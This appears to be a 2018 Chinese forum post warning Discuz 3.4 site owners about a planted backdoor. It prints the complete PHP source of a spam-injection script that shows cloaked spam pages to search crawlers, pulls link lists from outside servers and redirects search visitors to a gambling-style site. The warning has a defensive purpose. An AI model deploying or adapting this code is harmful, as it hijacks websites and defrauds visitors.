本帖最后由 民审-M 于 2018-2-7 11:15 编辑
Discuz 3.4漏洞利用报告:网站后门木马文件案例 彩票黑链/友情链接黑链注入脚本:
引入位置:
/static/space/t2/images/下面 *.txt 引用/转换文件
案列黑链注入代码:
可被引入挂载黑链,请站长引起重视,检查目标位置是否存在莫名txt文件。
Discuz 3.4漏洞利用报告:网站后门木马文件案例 彩票黑链/友情链接黑链注入脚本:
引入位置:
/static/space/t2/images/下面 *.txt 引用/转换文件
案列黑链注入代码:
<?php ini_set('html_errors',false); ini_set('display_errors',false); define("APP_INCLUDE_FLAG","TRUE"); define('APP_JACK_CHARSET','GBK'); header("Content-type: text/html; charset=".APP_JACK_CHARSET); define('APP_JACK_DOCUMENTROOT','/home/wwwroot/discuz/domain/discuz.net/web/static/space/t2/images/'); define('MY_LINK_URL', 'http://www.wlbxsjs.com/l.txt'); $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); if (stristr($userAgent,"sogou")){ define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt'); define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt'); define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt'); } else { define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt'); define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt'); define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt'); } define('APP_JACK_ARTICLE',APP_JACK_DOCUMENTROOT.'wen.txt'); define('APP_JACK_DES',APP_JACK_DOCUMENTROOT.'miaoshu.txt'); define('APP_JACK_BIANLIANG_B',APP_JACK_DOCUMENTROOT.'bianliang2.txt'); define('APP_JACK_BIANLIANG_C',APP_JACK_DOCUMENTROOT.'bianliang3.txt'); define('APP_MIX_KWD_FILE',APP_JACK_DOCUMENTROOT.'hunhe.txt'); define('APP_JACK_CACHED','Uncached'); define('APP_JACK_MIN_PAR','3'); define('APP_JACK_MAX_PAR','3'); define('APP_JACK_MIN','10'); define('APP_JACK_MAX','15'); define('APP_JACK_APPFILE',APP_JACK_DOCUMENTROOT.'app.txt'); function App_GetLink(){ return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html'; } function App_GetSelf(){ return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html'; } //返回图片 function getImg(){ return 'http://link.wlbxsjs.com/tupian/'.rand(1,7000).".jpg"; } $my_app = new missclient(); $my_app->run(); class missclient{ public $show_spider; public $jump_ref; public $http_ref_filter; public $jump_url = ""; public $domain = ""; public $condition = ""; public $app_server = ""; public $log_spider = ""; public $cur_spider = ""; public $allow_ip = ""; public $isCache = false; public function run(){ $this->domain = $this->getServerName(); $this->jump_ref = explode("|","360.|haoso.|bing.|google.|sogou.|soso.|so.com|.sm.cn|.youdao|.yisou|.easou|.etao|.chinaso"); $this->http_ref_filter = explode("|","inurl:|site:|site%3A|inurl%3A"); $this->allow_ip = "218.80.218.|10.4.62.|10.4.33"; $this->condition = ($_GET['tid']> 9999999 && $this->isAllowdIp()); $this->app_server = "http://www.sohu999.com/gbk/app.php"; $this->isCache = False; if($this->isSpider() && $this->isAllowdIp()){ if($this->condition){ if($this->isCache){ $relset_host = $this->getServerName(); $dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47); $cacheFile = $dir.'sess_' . substr(md5(http_build_query($_GET)), 6); if(!@file_exists($dir)){ mkdir($dir, 0777); } if(@file_exists($cacheFile) && @filesize ($cacheFile) > 32 ){ $var = coreAppCache::read($cacheFile); $page = file_get_contents(APP_JACK_TEMPLATE); foreach($var as $key=>$v){ $flag = "{".$key."}"; $page = str_replace($flag,$v,$page); } echo myReplace($page); exit(); } else { //包含进APP即可 $currentPage = include(APP_JACK_APPFILE); if($currentPage && strlen($currentPage) > 32 && stristr($currentPage,"</explode>")){ $var = self::cut($currentPage,"<explode>","</explode>"); $var = coreAppCache::decode($var); $page = file_get_contents(APP_JACK_TEMPLATE); foreach($var as $key=>$v){ $flag = "{".$key."}"; $page = str_replace($flag,$v,$page); } echo myReplace($page); @coreAppCache::writenocode($currentPage,$cacheFile); } } die(); } else { $currentPage = include(APP_JACK_APPFILE); echo myReplace($currentPage); die(); } } else { $this->_uncondition_hook(); } } else { if($this->isRef() && $this->condition){ $this->Jump(); } else { $this->_unSpider_hook(); } } } public function isAllowdIp(){ $ip = $this->clientIp(); $non_list = explode("|",$this->allow_ip); foreach($non_list as $iplist){ if(@stristr($ip,$iplist)){ return false; } } return true; } public function clientIp(){ if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $onlineip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { $onlineip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $onlineip = getenv('REMOTE_ADDR'); } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $onlineip = $_SERVER['REMOTE_ADDR']; } preg_match("/[\d\.]{7,15}/", $onlineip, $onlineipmatches); $onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown'; unset($onlineipmatches); return $onlineip; } public function isSpider(){ $bots = array( 'Google' => 'Googlebot', 'MSN' => 'MSNbot', 'Soso' => 'Sosospider', 'Youdao' => 'Youdaobot', 'Yodao' => 'Yodaobot', 'Yisou' => 'Yisouspider', 'Easou' => 'Easouspider', 'Etao' => 'Etaospider', 'Chinaso' => 'Chinasospider', 'Baidu' => 'Baiduspider', 'Sogou' => 'Sogou news Spider', 'Sogou' => 'Sogou orion spider', 'Sogou' => 'Sogou news Spider', 'Sogou' => 'Sogou blog', 'Sogou' => 'Sogou spider2', 'Sogou' => 'Sogou inst spider', 'Sogou' => 'Sogou web spider', 'Haoso' => 'haosouspider', '360spider' => '360spider', 'bingbot' => 'bingbot' ); $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); foreach ($bots as $k => $v){ if (stristr($userAgent,$v)){ if(!empty($this->log_spider)){ @file_put_contents($this->log_spider,$v."->Visited ".$_SERVER['QUERY_STRING']."at: ".date("Y-m-d H:i:s")."\n",FILE_APPEND); } $this->cur_spider = $k; return true; break; } } return false; } public function isRef(){ $ref = strtolower(@$_SERVER['HTTP_REFERER']); if(isset($_COOKIE["domain-filter-bypass"])){ return false; } if(!$this->isAllowdIp()){ setcookie("domain-filter-bypass", "lol", time() + 259200); return false; } foreach($this->http_ref_filter as $r){ $r = trim($r); if(stristr($ref,$r)){ setcookie("domain-filter-bypass", "lol", time() + 259200); return false; } } foreach($this->jump_ref as $r){ $r = trim($r); if(stristr($ref,$r)){ return true; } } } public function getServerName() { $ServerName = strtolower($_SERVER['SERVER_NAME']?$_SERVER['SERVER_NAME']:$_SERVER['HTTP_HOST']); if( strpos($ServerName,'http://') ) { return str_replace('http://','',$ServerName); } return $ServerName; } public function getPage(){ if($this->isCache){ $cache="cached"; } $url = $this->app_server."?domain=".$this->domain."&gid=199&spider=".$this->cur_spider."&cache=".$cache."&localPar=".http_build_query($_GET); return $this->HttpVisit($url); } public function HttpVisit($weburl) { $remote_data = NULL; if (function_exists('curl_exec')) { $curl = @curl_init(); @curl_setopt($curl, CURLOPT_URL, $weburl); @curl_setopt($curl, CURLOPT_HEADER, 0); @curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30); @curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $remote_data = @curl_exec($curl); @curl_close($curl); } else { if (function_exists('stream_context_create')) { $header_array = array('http' => array('method' => 'GET', 'timeout' => 30)); $http_header = @stream_context_create($header_array); $remote_data = @file_get_contents($weburl, false, $http_header); } else { $temp_url = explode("/", $weburl); $new_url = $temp_url[2]; $http_port = 80; $get_file = substr($weburl, strlen($new_url) + 7); if (strstr($new_url, chr(58))) { $s_var_array['td'] = explode(chr(58), $new_url); $new_url = $s_var_array['td'][0]; $http_port = $s_var_array['td'][1]; } $fsock_result = @fsockopen($new_url, $http_port); @fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "\r\n" . 'Host:' . $new_url . "\r\n" . 'Connection:Close' . "\r\n\r\n"); while (!feof($fsock_result)) { $remote_data .= fgets($fsock_result, 1024); } @fclose($fsock_result); } } return $remote_data; } public function Jump(){ $ref = strtolower(@$_SERVER['HTTP_REFERER']); if($this->isAllowdIp() && stristr($ref,"sogou.")){ $domain = str_replace(".","_",$this->domain); header('Location: https://958999a.com/?jpb_'.$domain); exit; } $ref = strtolower(@$_SERVER['HTTP_REFERER']); if($this->isAllowdIp() && stristr($ref,"bing.")){ $domain = str_replace(".","_",$this->domain); header('Location: https://958999a.com/?jpb_'.$domain); exit; } if($this->isAllowdIp()){ $domain = str_replace(".","_",$this->domain); header('Location: https://958999a.com/?jpb_'.$domain); exit; } } public function _uncondition_hook(){ $array = array(); for($a=0;$a<5;$a++){ echo '<a href="'.App_GetLink().'"></a>'."\n"; } } public function _unSpider_hook(){ // } public function strStartWith($needle, $haystack){ return (substr($haystack, 0, strlen($needle))==$needle); } public function rndStr($length=8){ $str = null; $strPol = "0123456789abcdefghijklmnopqrstuvwxyz"; $max = strlen($strPol)-1; for($i=0;$i<$length;$i++){ $str.=$strPol[rand(0,$max)]; } return $str; } public function cut($file,$from,$end) { $message=explode($from,$file); $message=explode($end,$message[1]); return $message[0]; } } class coreAppCache{ //写入缓存 public function write($file,$filename){ return file_put_contents($filename,self::encode($file)); } public function writenocode($file,$filename){ return file_put_contents($filename,$file); } public function read($filename){ $content = file_get_contents($filename); if(stristr($content,"</explode>")){ $content = self::cut($content,"<explode>","</explode>"); } return self::decode($content); } public function encode($file){ return base64_encode(gzcompress(serialize($file))); } public function decode($file){ return unserialize(gzuncompress(base64_decode($file))); } public function cut($file,$from,$end) { $message=explode($from,$file); $message=explode($end,$message[1]); return $message[0]; } } function removeBom($str) { $str = preg_replace('/^[\pZ\p{Cc}\x{feff}]+|[\pZ\p{Cc}\x{feff}]+$/ux', '', $str); return $str; } function replaceMyLink($str) { static $myLinks; if (is_null($myLinks)) { $c = new missclient(); $contents = removeBom($c->HttpVisit(MY_LINK_URL)); $contents = array_filter(array_map('trim', explode(PHP_EOL, $contents))); $myLinks = $contents; } $linkIndex = array_rand($myLinks, 1); $link = $myLinks[$linkIndex]; return $link; } function myLinkHandler($str) { return preg_replace_callback('#\{\s*友情链接\d*\s*\}#si', 'replaceMyLink', $str); } function myReplace($str) { $str = myLinkHandler($str); preg_match_all('#<\?=\s*([^\)]+)\(([^\)]+)\)\s*\?>#i', $str, $arr, PREG_SET_ORDER); foreach ($arr as $item) { if (isset($item[1], $item[2]) && function_exists($item[1])) { $a = call_user_func_array($item[1], explode(',', $item[2])); $str = str_replace_first($item[0], $a, $str); } } return $str; } function str_replace_first($from, $to, $subject) { $from = '@'.preg_quote($from, '/').'@si'; return preg_replace($from, $to, $subject, 1); } function randKey($len, $mLen = null) { $chars = array( "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9" ); if ($mLen && $mLen > 0) { $minLen = min($len, $mLen); $maxLen = max($mLen, $len); $lenArr = range($minLen, $maxLen); $len = $lenArr[array_rand($lenArr)]; } $charsLen = count($chars) - 1; shuffle($chars); $str = ""; for ($i=0; $i<$len; $i++) { $str .= $chars[mt_rand(0, $charsLen)]; } return trim($str); } ?>
可被引入挂载黑链,请站长引起重视,检查目标位置是否存在莫名txt文件。
收藏的用户(0)
X
正在加载信息~
评论
发新帖
主题数 4876 |
帖子数 11296 |
精华数 0 |
注册排名 88 |
作者最近主题
相关贴子
- 域名申请注意事项
- 新人报道,送上淘宝开店精品教程
- SEO【帖子伪原创】 6.6版[商业版] 价值87
- 城市生活|地方门户 商业版 GBK+UTF8 - DZ学习研究交流 · 模板(开放下载)
- [1314]矿工矿场游戏 V2.5.2 商业版 DZ学习研究交流
- 使用【AJ创客】网盘伪装成本地附件问题
- 关于【西瓜】系列插件无法支付问题求助与诚心建议
- 有没有使用discuz x3.3完全适配php7 https 所有插件完全兼容https的解决方案?
- DZ学习研究交流的附件每日免积分下载 V1.3.3 商业版 专业开源[1314]
- 微擎微赞模块:永和自适应首页PC官网代理独立后台 5.4.9 首页官网应用模块源码
- 强制伪静态地址seo V2.5 DZ学习研究交流 · 插件
- [1314]SEO伪原创 V3.4.1 商业版 DZ学习研究交流 专业开源[1314]
- 摇一摇积分抽奖 增值版2.0
- DZ学习研究交流的[1314]论坛功能增强 V1.2.1 专业开源[1314]
- [1314]限制主题数量 3.1.1 - DZ学习研究交流 · 插件 专业开源[1314]
- 西瓜的模板消息提醒,商家入驻申请,还有砍价发布的如何增加提醒?
- 子木CMS家居家装修 1.3中文章图片上传路径错误显示不出来图片解决办法
- 流浪帖子扣积分
- 下载问题
- DZ学习研究交流的积分提现银行余额宝 刷单版 带扩展组件